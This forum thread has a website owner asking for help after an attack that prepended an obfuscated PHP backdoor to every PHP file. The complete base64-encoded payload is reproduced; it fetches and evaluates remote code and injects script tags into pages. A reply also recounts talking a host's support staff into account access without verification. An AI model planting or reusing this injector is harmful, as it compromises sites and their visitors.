My forum has been hacked. All the php files have been changed.


All of the php files for my site have this code added to the very top:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZX QoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9u byddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJy kpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29u dGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aW YoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNv bnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT 09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlm b3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZX R1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83 NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJG NvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7 aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cm V0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwp e2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYW xzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1 cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cm xfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIs IDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVC wgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIs IDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG 9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7 cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83Nz coJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1m YWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYn VmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1 cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm 9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9w ZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPU Bmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigk ZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKT t9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVy biBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc2 9ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygn ZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QH BhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9 JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3 BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEk ZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVF RQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7 ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW 9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2Uo JGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbS wkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMp LmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb2 4gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlz dHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYW xzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0 J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3 N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYg KCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZX RfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7 aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0 Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJl cXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC 49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2Nr LCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZW FkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xv c2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bG lzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5j aHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZn VuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7 JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1 NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVh bDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3 R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYp e0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdH JzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNv ZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYm FzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBm dW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdG RvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJb J3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKE BmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10 aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZi AoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVw ZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb2 50ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1l bHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2 ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRj PUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aW YgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0y KV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNz c3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8 fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKC R1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25l IikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc1 9tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVh LCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdH Jpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lF IDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW 9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJE T0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2 lmICghQGlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlz X2RpcigkcnopKXskbXo9JHJ6O31lbHNleyRyej0kX1NFUlZFUl siU0NSSVBUX0ZJTEVOQU1FIl0uIi8ubG9ncy8iO2lmICghQGlz X2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlzX2Rpcigkcn opKXskbXo9JHJ6O319ZWxzZXskbXo9JHJ6O319fWVsc2V7JG16 PSRyejt9JGJvdD0wOyR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0 FHRU5UJ107aWYgKHN0cmlzdHIoJHVhLCJtc25ib3QiKXx8c3Ry aXN0cigkdWEsIllhaG9vIikpJGJvdD0xO2lmIChzdHJpc3RyKC R1YSwiYmluZ2JvdCIpfHxzdHJpc3RyKCR1YSwiZ29vZ2xlIikp JGJvdD0xOyRtc2llPTA7aWYgKGlzX21zaWVfNzc3KCR1YSkpJG 1zaWU9MTskbWFjPTA7aWYgKGlzX21hY183NzcoJHVhKSkkbWFj PTE7aWYgKCgkbXNpZT09MCkmJigkbWFjPT0wKSkkYm90PTE7IC BnbG9iYWwgJF9TRVJWRVI7ICAgICRfU0VSVkVSWydzX3AxJ109 JG16OyAgJF9TRVJWRVJbJ3NfYjEnXT0kYm90OyAgJF9TRVJWRV JbJ3NfdDEnXT0xMjAwOyAgJF9TRVJWRVJbJ3NfZDEnXT1iYXNl NjRfZGVjb2RlKCdhSFIwY0RvdkwyVnVjekV5TW5wNmVtUmtZWH A2TG1OdmJTOD0nKTsgICRkPSc/ZD0nLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pLi ImcD0iLnVybGVuY29kZSgkX1NFUlZFUlsiUEhQX1NFTEYiXSku IiZhPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQU dFTlQiXSk7ICAkX1NFUlZFUlsnc19hMSddPWJhc2U2NF9kZWNv ZGUoJ2FIUjBjRG92TDJOdmIzQmxjbXB6ZFhSbU9DNXlkUzluWD J4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsnc19hMiddPWJh c2U2NF9kZWNvZGUoJ2FIUjBjRG92TDI1c2FXNTBhR1YzYjI5a0 xtTnZiUzluWDJ4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsn c19zY3JpcHQnXT0ibmwucGhwP3A9ZCI7ICB9ICAgICAgc2V0dX BfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0 cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgIC AgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19i MSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLm dldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3Njcmlw dCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXz c3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdn emRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZG Vjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkp OyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj 1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAk c3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKC R0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCks JHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdH Jwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYo JHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdG UoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09 PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcm V0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAg QEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJG RlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsg IGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZW RfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhc PFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJy QxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJu ICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2 Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));?>

I need help and advice. I am in the process of removing the code. I've reuploaded all the files, but am going through and having to manually edit files of add-ons and stuff.

Basically this php code wiped out everything but the first few inches of a page. Everything below that was gone. Searches were not functional, etc. It's a big mess.

check logs see how they got in and change all passwords

I've contacted my host (bluehost) and they said there is no way for them to see the history of who has logged into my bluehost account.

Is there any other way I can check?

I have dealt with bluehost in the past and they are just not someone I trust at all. You might want to think about switching to another hosting solution.

Without enough persistence from me and a few questions that I asked them I was able to get them to give me access to an account of mine that I had no idea what the credentials were. They should of never given me access or changed any information for me to access that account because "I" was not able to verify who I was, yet I still got what I wanted.

Just saw a .logs file. In it was a logs1.txt file with a bunch of weird urls listed in it.

I deleted it.

--------------- Added 1348866181 at 1348866181 ---------------

Found and removed all the code. Everything is working now (I hope anyway). Still can't figure out how someone got in or where they got in.

If anyone has any advice or has any ideas, please let me know.

Every host keeps logs if they say they don't they are lying

Every host keeps logs if they say they don't they are lying


Exactly ForceHSS, I had very bad experiences with those guys.

michelle86 do your self a favor and switch to another host to save your self future head aches.

I use HostGator michelle86, check them out.